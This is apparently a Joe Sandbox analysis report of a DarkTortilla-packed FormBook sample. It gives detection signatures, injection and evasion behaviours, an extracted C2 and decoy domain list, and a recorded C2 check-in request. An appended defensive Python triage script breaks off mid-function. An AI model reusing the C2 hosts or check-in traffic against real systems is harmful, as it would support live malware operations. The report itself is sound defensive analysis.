Windows Analysis Report
yaM8XR1HfL.exe

Overview

General Information

Sample name: yaM8XR1HfL.exe
(renamed because the original name is a hash value)
Original sample name: 148da9a63f027b2e7625f0b82b42bc795737b55c46d040af508fdcea2bccad98.exe
Analysis ID: 1465386
MD5: 64a5e155baded9185ecd1fa9946c13aa
SHA1: 4e7c62d7d5b1353bfc0e0220ae89e5409201bc70
SHA256: 148da9a63f027b2e7625f0b82b42bc795737b55c46d040af508fdcea2bccad98
Tags: exe

Detection

DarkTortilla, FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected FormBook
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Name: DarkTortilla
Description: DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging. From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Name: Formbook, Formbo
Description: FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
Attribution: SWEED, Cobalt
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

AV Detection

Source: http://www.nona23.lat/na10/www.giorgiaclerico.com Avira URL Cloud: Label: malware
Source: http://www.productivagc.com/na10/www.dexcoenergy.com Avira URL Cloud: Label: malware
Source: http://www.nona23.lat/na10/ Avira URL Cloud: Label: malware
Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.liamcollinai.com/na10/"], "decoy": ["tetheus.com", "ventlikeyoumeanit.com", "tintbliss.com", "rinabet357.com", "sapphireboutiqueusa.com", "abc8bet6.com", "xzcn3i7jb13cqei.buzz", "pinktravelsnagpur.com", "bt365038.com", "rtpbossujang303.shop", "osthirmaker.com", "thelonelyteacup.com", "rlc2019.com", "couverture-charpente.com", "productivagc.com", "defendercarcare.com", "abcentixdigital.com", "petco.ltd", "oypivh.top", "micro.guru", "hokivegasslots.club", "5663876.com", "symboleffekt.info", "tworiverlabsintake.com", "pegaso.store", "sasoera.com", "material.chat", "taniamckirdy.com", "dansistosproductions.com", "moromorojp.com", "z27e1thx976ez3u.buzz", "skinrenue.com", "nbvci.xyz", "jakobniinja.xyz", "snykee.com", "sl24.top", "wawturkiye.xyz", "virtualeventsbyelaine.com", "giorgiaclerico.com", "d9psk8.xyz", "hard-to-miss.space", "awclog.com", "topcomparativos.com", "somoyboutique.com", "findlove.pro", "zbo170.app", "dexcoenergy.com", "nona23.lat", "ingelset.com", "hexatelier.com", "nftees.tech", "visionarymaterialsinstitute.com", "khanyos.com", "bz59.top", "migraine-treatment-28778.bond", "catboxbot.online", "kkugames.com", "llmsearchoptimization.com", "fipbhvvb.xyz", "vmytzptc.xyz", "intermediafx.shop", "lhrrs.com", "grimreapervalley.com", "discount-fess.space"]}
Source: yaM8XR1HfL.exe ReversingLabs: Detection: 68%
Source: Yara match File source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: yaM8XR1HfL.exe Joe Sandbox ML: detected
Source: yaM8XR1HfL.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: WWAHost.pdb source: yaM8XR1HfL.exe, 00000004.00000002.2550784274.0000000003090000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 00000009.00000002.3292650503.0000000000120000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: WWAHost.pdbUGP source: yaM8XR1HfL.exe, 00000004.00000002.2550784274.0000000003090000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3292650503.0000000000120000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: yaM8XR1HfL.exe, 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2551493393.0000000003EAA000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2549750723.0000000003CF7000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.00000000041EE000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.0000000004050000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: yaM8XR1HfL.exe, yaM8XR1HfL.exe, 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 00000009.00000003.2551493393.0000000003EAA000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2549750723.0000000003CF7000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.00000000041EE000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.0000000004050000.00000040.00001000.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0017212C memset,FindFirstFileW,FindClose, 9_2_0017212C

Networking

Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 217.160.0.1:80
Source: Malware configuration extractor URLs: www.liamcollinai.com/na10/
Source: global traffic HTTP traffic detected:
GET /na10/?y2=vxBAV4x3qjJKkl3AB8S3aH8FdY2weIJ3+CekvXUcdu0/pCH7SUv9XlMLgROraoBr2jfW&DV=lbC06h HTTP/1.1
Host: www.nftees.tech
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii: (not printable; the seven body bytes are 0x00)
Source: Joe Sandbox View IP Address: 217.160.0.1 217.160.0.1
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\explorer.exe Code function: 7_2_09258F82 getaddrinfo,setsockopt,recv, 7_2_09258F82
Source: global traffic DNS traffic detected: DNS query: www.osthirmaker.com
Source: global traffic DNS traffic detected: DNS query: www.nftees.tech
Source: explorer.exe, 00000007.00000002.3302042587.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3302042587.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000007.00000000.2496782788.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3292908189.0000000000F13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: explorer.exe, 00000007.00000002.3302042587.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3302042587.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000007.00000002.3302042587.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3302042587.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: yaM8XR1HfL.exe, 00000000.00000002.2508647443.0000000005F43000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://iptc.org/std/Iptc4xmde
Source: yaM8XR1HfL.exe, 00000000.00000002.2508647443.0000000005F43000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.adobe.
Source: explorer.exe, 00000007.00000002.3302042587.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3302042587.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000007.00000002.3302042587.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000007.00000000.2501022529.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2501770890.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.3301294769.0000000008870000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.abc8bet6.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.abc8bet6.com/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.abc8bet6.com/na10/www.productivagc.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.abc8bet6.comReferer:
Source: explorer.exe, 00000007.00000000.2509419071.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2652534535.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2509419071.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3306031223.000000000C81C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.awclog.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.awclog.com/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.awclog.com/na10/www.sasoera.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.awclog.comReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bz59.top
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bz59.top/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bz59.top/na10/www.jakobniinja.xyz
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bz59.topReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.dexcoenergy.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.dexcoenergy.com/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.dexcoenergy.com/na10/www.hokivegasslots.club
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.dexcoenergy.comReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.giorgiaclerico.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.giorgiaclerico.com/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.giorgiaclerico.com/na10/www.bz59.top
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.giorgiaclerico.comReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hokivegasslots.club
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hokivegasslots.club/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hokivegasslots.club/na10/www.thelonelyteacup.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hokivegasslots.clubReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.jakobniinja.xyz
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.jakobniinja.xyz/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.jakobniinja.xyz/na10/e
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.jakobniinja.xyzReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.liamcollinai.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.liamcollinai.com/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.liamcollinai.com/na10/www.nona23.lat
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.liamcollinai.comReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nbvci.xyz
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nbvci.xyz/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nbvci.xyz/na10/www.abc8bet6.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nbvci.xyzReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nftees.tech
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nftees.tech/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nftees.tech/na10/www.nbvci.xyz
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nftees.techReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nona23.lat
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nona23.lat/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nona23.lat/na10/www.giorgiaclerico.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.nona23.latReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.osthirmaker.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.osthirmaker.com/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.osthirmaker.com/na10/www.nftees.tech
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.osthirmaker.comReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.productivagc.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.productivagc.com/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.productivagc.com/na10/www.dexcoenergy.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.productivagc.comReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sasoera.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sasoera.com/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sasoera.com/na10/www.liamcollinai.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.sasoera.comReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.snykee.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.snykee.com/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.snykee.com/na10/www.awclog.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.snykee.comReferer:
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thelonelyteacup.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thelonelyteacup.com/na10/
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thelonelyteacup.com/na10/www.snykee.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thelonelyteacup.comReferer:
Source: explorer.exe, 00000007.00000002.3305263776.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2508398700.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000007.00000002.3299618126.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2499817163.00000000076F8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000007.00000000.2502264257.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3302042587.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000007.00000002.3299618126.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2499817163.0000000007637000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000007.00000000.2498190628.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2651889553.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3296372597.00000000035FA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2651644758.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094394902.0000000009B86000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000007.00000002.3302850140.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2651644758.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094394902.0000000009D42000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000007.00000000.2508398700.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3305263776.000000000C460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000007.00000002.3302042587.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000007.00000002.3302042587.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comon
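The check-in recorded in this section (a GET to /na10/ on a host taken from the decoy list, no User-Agent, Connection: close, a body of seven null bytes) together with the configuration the extractor pulled from memory is enough for a first-pass network triage. The Python below is an added example written for this page; it is not code from the Joe Sandbox report and not FormBook code. It embeds the extractor's configuration verbatim, reconstructs the request bytes from the "HTTP traffic detected" line (CRLF framing, header order and the absence of any further header are assumed from what the report shows), classifies the Host header against the C2 and decoy lists, derives the campaign path from the C2 entry, scores the request shape, and pulls the rotation hostnames out of the concatenated strings recovered from explorer.exe memory. The meaning of the y2 and DV query parameters is not decoded.

```python
"""Network-IOC triage for the FormBook check-in recorded in this report.

Added example for this page; not part of the Joe Sandbox report and not
FormBook code. CONFIG is the JSON the report's Malware Configuration
Extractor produced. REQUEST is reconstructed from the report's 'HTTP
traffic detected' line: CRLF framing, header order and the absence of
any further header are assumed; the seven 0x00 body bytes are as listed.
"""
import json
import re
from urllib.parse import parse_qs, urlsplit

CONFIG = {
    "C2 list": ["www.liamcollinai.com/na10/"],
    "decoy": [
        "tetheus.com", "ventlikeyoumeanit.com", "tintbliss.com", "rinabet357.com", "sapphireboutiqueusa.com",
        "abc8bet6.com", "xzcn3i7jb13cqei.buzz", "pinktravelsnagpur.com", "bt365038.com", "rtpbossujang303.shop",
        "osthirmaker.com", "thelonelyteacup.com", "rlc2019.com", "couverture-charpente.com", "productivagc.com",
        "defendercarcare.com", "abcentixdigital.com", "petco.ltd", "oypivh.top", "micro.guru",
        "hokivegasslots.club", "5663876.com", "symboleffekt.info", "tworiverlabsintake.com", "pegaso.store",
        "sasoera.com", "material.chat", "taniamckirdy.com", "dansistosproductions.com", "moromorojp.com",
        "z27e1thx976ez3u.buzz", "skinrenue.com", "nbvci.xyz", "jakobniinja.xyz", "snykee.com",
        "sl24.top", "wawturkiye.xyz", "virtualeventsbyelaine.com", "giorgiaclerico.com", "d9psk8.xyz",
        "hard-to-miss.space", "awclog.com", "topcomparativos.com", "somoyboutique.com", "findlove.pro",
        "zbo170.app", "dexcoenergy.com", "nona23.lat", "ingelset.com", "hexatelier.com",
        "nftees.tech", "visionarymaterialsinstitute.com", "khanyos.com", "bz59.top", "migraine-treatment-28778.bond",
        "catboxbot.online", "kkugames.com", "llmsearchoptimization.com", "fipbhvvb.xyz", "vmytzptc.xyz",
        "intermediafx.shop", "lhrrs.com", "grimreapervalley.com", "discount-fess.space",
    ],
}

REQUEST = (
    b"GET /na10/?y2=vxBAV4x3qjJKkl3AB8S3aH8FdY2weIJ3+CekvXUcdu0/"
    b"pCH7SUv9XlMLgROraoBr2jfW&DV=lbC06h HTTP/1.1\r\n"
    b"Host: www.nftees.tech\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"\x00\x00\x00\x00\x00\x00\x00"
)

# Rotation hostnames as they appear in the concatenated strings recovered from
# explorer.exe memory, e.g. http://www.a.com/na10/www.b.com. Lower-case only,
# so the 'Referer:' suffix seen on some of those strings is not swallowed.
HOST_RE = re.compile(r"www\.[a-z0-9-]+(?:\.[a-z0-9-]+)+")


def c2_host_and_path(config):
    """Split the C2 entry 'host/path/' into ('host', '/path/')."""
    host, _, rest = config["C2 list"][0].partition("/")
    return host, "/" + rest


def watchlist(config):
    """Every hostname the sample may contact: C2 and decoys, with and
    without the 'www.' prefix the sample prepends on the wire."""
    c2_host, _ = c2_host_and_path(config)
    hosts = {c2_host, c2_host.removeprefix("www.")}
    for decoy in config["decoy"]:
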